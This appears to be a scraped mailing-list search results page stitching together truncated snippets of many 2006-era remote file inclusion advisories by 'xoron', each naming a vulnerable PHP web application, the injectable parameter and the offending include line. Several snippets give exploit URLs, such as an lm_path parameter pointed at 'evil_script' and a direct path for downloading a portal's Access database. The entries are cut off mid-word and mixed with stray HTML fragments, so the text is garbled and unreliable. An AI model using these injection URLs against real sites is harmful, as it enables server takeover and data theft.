-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpBB User Viewed Posts Tracker Version <= 1.0 [phpbb_root_path] File Include
Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(t
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpMyTeam v2.0 <= (smileys_dir) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-
###
#phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2)
#Author: XORON - SHiKaA
#URL: http
Newswriter SW v1.4.2 Remote File Include Exploit :: XORON ::
TURKISH HACKER ::"
.""
."body {background-color: #006600;}"
."body,td,th {color: #FF;}"
.""
."http://xoron.biz/teamvh4.png\";>"
."script url: (ex.
http://www.site.com/[script_path]/include/main.inc.php?NWCONF_SYSTEM[server_p
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==
/jump.php?action=script&id=1082
#Class: Remote
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
#Code: inc
: Remote
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
#Code: include_once ($chemin."conf/code.php")
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
#Code: require($lvc_include_dir.'db/db_mysql.inc.php');
#Expl
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
#Code: in admin.cropcanvas.php , line 7
require_once $cropimagedir."class.cropinterface.php";
#Fi
PROTECTED]: x0r0n[at]hotmail[dot]com
#Code: in install.jim.php , line 16
require_once($mosConfig_absolute_path."/components/com_jim/readme.txt");
#Expl
(component_dir) Remote File Inclusion Vulnerabilities
Author: xoron
Class : Remote
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
: TinyWebGallery
--
Class: Remote
--
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
: xoron
Class : Remote
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
Code:
include ($CFG["libdir"] . "
***
TiTLE: docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability
-
Author: xoron
-
Class : Remote
-
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
-
URL: http://docpile-we.berlios.de
-
Exploit:
http://www.site.com/[path]/lib/folder.class.php
#title: Visual Events Calendar v1.1 (cfg_dir) Remote Inclusion Vulnerability
#Author: xoron
#script: Visual Events Calendar v1.1
#Class : Remote
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
#CODE:include $cfg_dir."customize_text.php";
#Exploit: http://www.site
///CYBER-WARRiOR.ORG\
#ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: ZoneX 1.0.3 - Publishers Gold Edition
-
#Class : Remote
-
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
///CYBER-WARRiOR.ORG\
#SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: SaveWeb Portal
-
#Class : Remote
-
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
-
#CODE:include($SITE_P
I found this bug in 2006-07-27.
exploit here:
http://www.milw0rm.com/exploits/2081
title : Keyif Portal v2.0 - Microsoft Access Driver ( MDB ) Download
-
script site : http://www.keyifweb.com/
-
Discovered : xoron
-
[EMAIL PROTECTED]: [EMAIL PROTECTED]
-
Exploit: http://www.target.com/[path]/A9S7G6ASD790/ANKET/anket.mdb
http://www.target.co
ListMessenger v0.9.3 Remote File Inclusion Vulnerability
-
Discoverd By : xoron
-
Conatact : x0r0n[at]hotmail.com
-
script: ListMessenger 0.9.3
-
URL: http://www.listmessenger.com
-
Exp: www.target.com/[path]/enduser/listmessenger.php?lm_path=evil_script?
-
Code
Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability
--
Discoverd By: XORON
--
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
--
Exploit: http://sitename.
ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability
--
Discoverd By: XORON
--
[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com
--
script site: www.scoznet.
25 matches
Mail list logo